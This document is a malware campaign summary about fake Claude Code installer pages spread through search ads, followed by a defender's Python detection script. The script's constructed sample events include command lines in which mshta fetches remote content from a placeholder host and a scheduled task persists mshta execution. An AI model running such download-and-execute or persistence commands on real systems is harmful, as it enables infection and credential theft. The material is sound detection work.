The InstallFix campaign distributes malware through fake Claude AI installer pages promoted via Google Ads. When users search for 'Claude Code' and click sponsored results, they land on convincing fake install pages that trick them into running malicious PowerShell commands. The multi-stage infection chain uses mshta.exe to fetch a ZIP/HTA polyglot file, executes obfuscated VBScript silently, bypasses AMSI using RC4-decrypted strings and memory patching, disables SSL validation, and delivers a fileless payload via victim-unique C2 URLs. The final payload is linked to RedLine Stealer and achieves persistence via scheduled tasks. Targets span government, education, electronics, and food & beverage sectors across the Americas, APAC, EMEA, and Europe.
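The chain summarised above leaves a recognisable trail in process-creation telemetry: mshta.exe launched with a remote URL (and one that does not even end in .hta, since the fetched file is a ZIP/HTA polyglot), PowerShell spawned by a script host rather than by a shell or the user, and schtasks.exe creating a task whose action is again mshta or PowerShell. The following Python is an added defender-side example, not code from the original report or from any vendor; the Sysmon-style events it scans are constructed samples, the domain example.invalid is a placeholder, and the rule names and `ProcessEvent` fields are this example's own assumptions.

```python
"""Toy detection pass over constructed process-creation events.

Each ProcessEvent mirrors the minimum an EDR or Sysmon Event ID 1 record
carries: parent image, image, command line.  The rules encode the three
observable steps of the chain described in the text and nothing more.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(ev: ProcessEvent) -> list[str]:
    """Return the rule names this single event triggers (empty list = clean)."""
    hits: list[str] = []
    image = basename(ev.image)
    parent = basename(ev.parent_image)
    cmd = ev.command_line
    urls = URL_RE.findall(cmd)

    # Step 1: mshta.exe pulling content from a URL at all is rare for users;
    # a URL whose path is not .hta (e.g. .zip) matches the polyglot trick.
    if image == "mshta.exe" and urls:
        hits.append("mshta_remote_content")
        if any(not u.split("?")[0].lower().endswith(".hta") for u in urls):
            hits.append("mshta_non_hta_url")

    # Step 2: PowerShell whose parent is a script host (mshta/wscript/cscript).
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        hits.append("powershell_from_script_host")

    # Step 3: persistence via a scheduled task that runs a script host.
    lowered = cmd.lower()
    if image == "schtasks.exe" and "/create" in lowered and any(
        tok in lowered for tok in ("mshta", "powershell", "pwsh")
    ):
        hits.append("scheduled_task_runs_script_host")

    return hits


def scan(events: list[ProcessEvent]) -> list[tuple[int, list[str]]]:
    """Index and rule hits for every event that triggered at least one rule."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := evaluate(ev))]


# Constructed sample telemetry (placeholder host example.invalid).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 'mshta.exe https://example.invalid/ClaudeSetup.zip'),
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -NoProfile -WindowStyle Hidden -Command "..."'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\schtasks.exe",
                 'schtasks.exe /create /tn Updater /sc minute /mo 30 '
                 '/tr "mshta https://example.invalid/u"'),
    # Benign-looking controls: local .hta, and PowerShell run by the user.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 r'mshta.exe C:\Users\alice\Documents\readme.hta'),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -Command Get-ChildItem'),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The rules are deliberately narrow so they can be read as a checklist of the chain's observable steps; in production each would be a hunt query over your EDR's process-creation table, with the local .hta and user-run PowerShell controls kept to confirm the rules stay quiet on ordinary activity.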